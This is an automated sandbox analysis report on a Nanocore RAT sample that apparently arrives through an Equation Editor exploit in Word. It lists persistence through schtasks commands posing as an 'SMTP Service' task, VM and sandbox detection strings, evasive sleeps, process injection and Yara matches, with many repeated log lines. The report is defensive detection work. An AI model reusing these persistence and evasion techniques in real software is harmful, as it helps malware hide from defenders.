Source: 5.0.cat464923.exe.400000.1.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\AppData\Roaming\cat464923.exe File created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\catx[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\cat464923.exe

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp60E5.tmp'

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\AppData\Roaming\cat464923.exe File opened: C:\Users\user\AppData\Roaming\cat464923.exe:Zone.Identifier read attributes | delete
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 00000004.00000002.2090289398.000000000240A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2209835071.00000000023AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2206312034.00000000020DC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2211026677.000000000226A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: smtpsvc.exe PID: 2416, type: MEMORY
Source: Yara match File source: Process Memory Space: cat464923.exe PID: 2468, type: MEMORY
Source: Yara match File source: Process Memory Space: cat464923.exe PID: 2668, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: cat464923.exe, 00000004.00000002.2090289398.000000000240A000.00000004.00000001.sdmp, cat464923.exe, 0000000B.00000002.2211026677.000000000226A000.00000004.00000001.sdmp, smtpsvc.exe, 0000000C.00000002.2206312034.00000000020DC000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: cat464923.exe, 00000004.00000002.2090289398.000000000240A000.00000004.00000001.sdmp, cat464923.exe, 0000000B.00000002.2211026677.000000000226A000.00000004.00000001.sdmp, smtpsvc.exe, 0000000C.00000002.2206312034.00000000020DC000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Roaming\cat464923.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Roaming\cat464923.exe Window / User API: threadDelayed 7770
Source: C:\Users\user\AppData\Roaming\cat464923.exe Window / User API: threadDelayed 1932
Source: C:\Users\user\AppData\Roaming\cat464923.exe Window / User API: foregroundWindowGot 501
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2448 Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Roaming\cat464923.exe TID: 2340 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\cat464923.exe TID: 2656 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\cat464923.exe TID: 3020 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\cat464923.exe TID: 2488 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\taskeng.exe TID: 2512 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\cat464923.exe TID: 2344 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\cat464923.exe TID: 2936 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 3044 Thread sleep time: -60000s >= -30000s
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2240 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2292 Thread sleep time: -60000s >= -30000s
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2220 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\cat464923.exe TID: 2448 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2808 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2568 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\cat464923.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Thread delayed: delay time: 922337203685477
Source: smtpsvc.exe, 0000000C.00000002.2206312034.00000000020DC000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
Source: smtpsvc.exe, 0000000C.00000002.2206312034.00000000020DC000.00000004.00000001.sdmp Binary or memory string: vmware
Source: smtpsvc.exe, 0000000C.00000002.2206312034.00000000020DC000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: smtpsvc.exe, 0000000C.00000002.2206312034.00000000020DC000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: smtpsvc.exe, 0000000C.00000002.2206312034.00000000020DC000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: smtpsvc.exe, 0000000C.00000002.2206312034.00000000020DC000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: smtpsvc.exe, 0000000C.00000002.2206312034.00000000020DC000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: smtpsvc.exe, 0000000C.00000002.2206312034.00000000020DC000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: smtpsvc.exe, 0000000C.00000002.2206312034.00000000020DC000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process information queried: ProcessInformation

Anti Debugging:

Enables debug privileges
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\cat464923.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\cat464923.exe Memory written: C:\Users\user\AppData\Roaming\cat464923.exe base: 400000 value starts with: 4D5A
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Memory written: C:\Program Files (x86)\SMTP Service\smtpsvc.exe base: 400000 value starts with: 4D5A
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\cat464923.exe C:\Users\user\AppData\Roaming\cat464923.exe
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process created: C:\Users\user\AppData\Roaming\cat464923.exe {path}
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp60E5.tmp'
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp4F5A.tmp'
Source: C:\Windows\System32\taskeng.exe Process created: C:\Users\user\AppData\Roaming\cat464923.exe C:\Users\user\AppData\Roaming\cat464923.exe 0
Source: C:\Windows\System32\taskeng.exe Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe {path}
Source: cat464923.exe, 00000005.00000002.2348187479.0000000002522000.00000004.00000001.sdmp Binary or memory string: Program Manager480m<RX
Source: cat464923.exe, 00000005.00000002.2350970656.00000000029C2000.00000004.00000001.sdmp, taskeng.exe, 0000000A.00000002.2347157070.00000000008B0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: cat464923.exe, 00000005.00000002.2347908257.0000000000CB0000.00000002.00000001.sdmp, taskeng.exe, 0000000A.00000002.2347157070.00000000008B0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: cat464923.exe, 00000005.00000002.2348187479.0000000002522000.00000004.00000001.sdmp Binary or memory string: Program Manager480m<+W
Source: cat464923.exe, 00000005.00000002.2348187479.0000000002522000.00000004.00000001.sdmp Binary or memory string: Program Manager480m
Source: cat464923.exe, 00000005.00000002.2352118434.00000000057FC000.00000004.00000001.sdmp Binary or memory string: kProgram Manager
Source: cat464923.exe, 00000005.00000002.2348187479.0000000002522000.00000004.00000001.sdmp Binary or memory string: Program Manager480m0
Source: cat464923.exe, 00000005.00000002.2347908257.0000000000CB0000.00000002.00000001.sdmp, taskeng.exe, 0000000A.00000002.2347157070.00000000008B0000.00000002.00000001.sdmp Binary or memory string: !Progman
Source: cat464923.exe, 00000005.00000002.2348265512.00000000025C2000.00000004.00000001.sdmp Binary or memory string: Program Manager480mx
Source: cat464923.exe, 00000005.00000002.2350970656.00000000029C2000.00000004.00000001.sdmp Binary or memory string: Program ManagerTV0m
Source: cat464923.exe, 00000005.00000002.2348265512.00000000025C2000.00000004.00000001.sdmp Binary or memory string: Program Manager480ma
Source: cat464923.exe, 00000005.00000002.2348265512.00000000025C2000.00000004.00000001.sdmp Binary or memory string: Program Manager480mPvf
Source: cat464923.exe, 00000005.00000002.2348265512.00000000025C2000.00000004.00000001.sdmp Binary or memory string: Program Manager480m|

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Roaming\cat464923.exe Queries volume information: C:\Users\user\AppData\Roaming\cat464923.exe VolumeInformation
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Queries volume information: C:\Program Files (x86)\SMTP Service\smtpsvc.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\cat464923.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Nanocore RAT
Source: Yara match File source: 00000010.00000000.2148512830.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2220223642.0000000003359000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2348105483.0000000002491000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2218871109.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.2088911305.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2221684497.0000000003309000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2347482313.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2091457817.0000000003585000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.2184659312.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2220476189.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2351063180.00000000034D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2212946414.0000000003525000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2217963570.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2213146011.00000000033E5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000000.2147864826.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.2148426464.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2212398437.0000000003379000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2220405288.0000000002281000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2090874176.00000000033D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2220469007.0000000003289000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2221628087.0000000002301000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2220153845.0000000002351000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.2088546622.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.2168272542.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2209068863.00000000030A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.2169977777.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2347409859.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2212832493.0000000003239000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2210122241.0000000003255000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: smtpsvc.exe PID: 2416, type: MEMORY
Source: Yara match File source: Process Memory Space: cat464923.exe PID: 2468, type: MEMORY
Source: Yara match File source: Process Memory Space: cat464923.exe PID: 2324, type: MEMORY
Source: Yara match File source: Process Memory Space: cat464923.exe PID: 2668, type: MEMORY
Source: Yara match File source: 17.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.34e019c.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.4a0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.smtpsvc.exe.339b366.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.smtpsvc.exe.3444d80.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.34db366.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cat464923.exe.32d019c.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cat464923.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.400000.1.unpack, type: UNPACKEDPE
